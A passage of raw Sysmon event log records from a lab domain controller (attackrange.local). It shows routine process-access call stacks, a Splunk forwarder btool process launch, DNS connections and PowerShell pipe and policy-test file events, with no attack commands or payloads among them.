2\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053766Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053765Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053764Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053763Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053762Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD3-6151-4F00-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053761Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.969{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD3-6151-4F00-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18192|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053760Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.972{5EBD8912-8CD3-6151-4F00-00000000FD01}3508C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-strptime --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 354300x80000000000000001053759Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.401{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62749- 354300x80000000000000001053758Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.401{5EBD8912-8CC0-6151-1400-00000000FD01}1040C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local62749-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domain 10341000x80000000000000001053757Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.763{5EBD8912-8CD3-6151-4E00-00000000FD01}33483376C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.559{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.559{5EBD8912-8CBD-6151-0B00-00000000FD01}6402736C:\Windows\system32\lsass.exe{5EBD8912-8CD3-6151-4C00-00000000FD01}3152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x80000000000000001053754Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-CreatePipe2021-09-27 09:20:19.526{5EBD8912-8CD3-6151-4C00-00000000FD01}3152\PSHost.132772080190910992.3152.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000001053753Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.526{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+261b7|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053752Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.526{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+25d35|C:\Windows\system32\wbem\wmiprvsd.dll+2619d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001053751Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.526{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053750Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.526{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+281af|C:\Windows\system32\wbem\wmiprvsd.dll+2982c|C:\Windows\system32\wbem\wmiprvsd.dll+292fb|C:\Windows\system32\wbem\wmiprvsd.dll+26165|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001053749Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.526{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053748Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.495{5EBD8912-8CC0-6151-1600-00000000FD01}12961780C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2E00-00000000FD01}2384C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+264a1|C:\Windows\system32\wbem\wmiprvsd.dll+2669f|C:\Windows\system32\wbem\wmiprvsd.dll+25c4b|C:\Windows\system32\wbem\wmiprvsd.dll+27476|C:\Windows\system32\wbem\wmiprvsd.dll+27db2|C:\Windows\system32\wbem\wmiprvsd.dll+277c9|C:\Windows\system32\wbem\wmiprvsd.dll+26100|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+12d0|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c 10341000x80000000000000001053747Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.495{5EBD8912-8CD0-6151-2E00-00000000FD01}23843552C:\Windows\system32\DFSRs.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+abad|C:\Windows\system32\wbem\wmidcprv.dll+b57e|C:\Windows\system32\wmidcom.dll+58a6|C:\Windows\system32\wmidcom.dll+5464|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053746Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.495{5EBD8912-8CD3-6151-4C00-00000000FD01}3152NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_l0ohzinz.0a4.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053745Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053744Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053743Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053742Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053741Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:19.479{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053740Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 